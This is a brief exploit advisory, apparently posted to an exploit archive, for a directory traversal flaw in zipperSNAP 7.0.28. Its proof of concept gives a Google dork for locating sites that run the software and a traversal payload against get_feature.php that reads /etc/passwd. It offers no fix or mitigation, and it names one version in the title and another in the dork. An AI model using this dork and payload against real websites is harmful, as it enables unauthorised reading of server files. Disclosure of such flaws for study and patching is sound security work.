zipperSNAP version 7.0.28 suffers from a directory traversal vulnerability.
68133bd8f39ff33782a37a6e67421103====================================================================================================================================
| # Title : zipperSNAP 7.0.28 Directory traversal Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://zippersnap.com/ |
| # Dork : "site design by zipperSNAP 7.0.29" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] in search box use payload : /scp/get_feature.php?file=../../../../../../../../../../etc/passwd
[+] http://127.0.0.1/scp/get_feature.php?file=../../../../../../../../../../etc/passwd
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================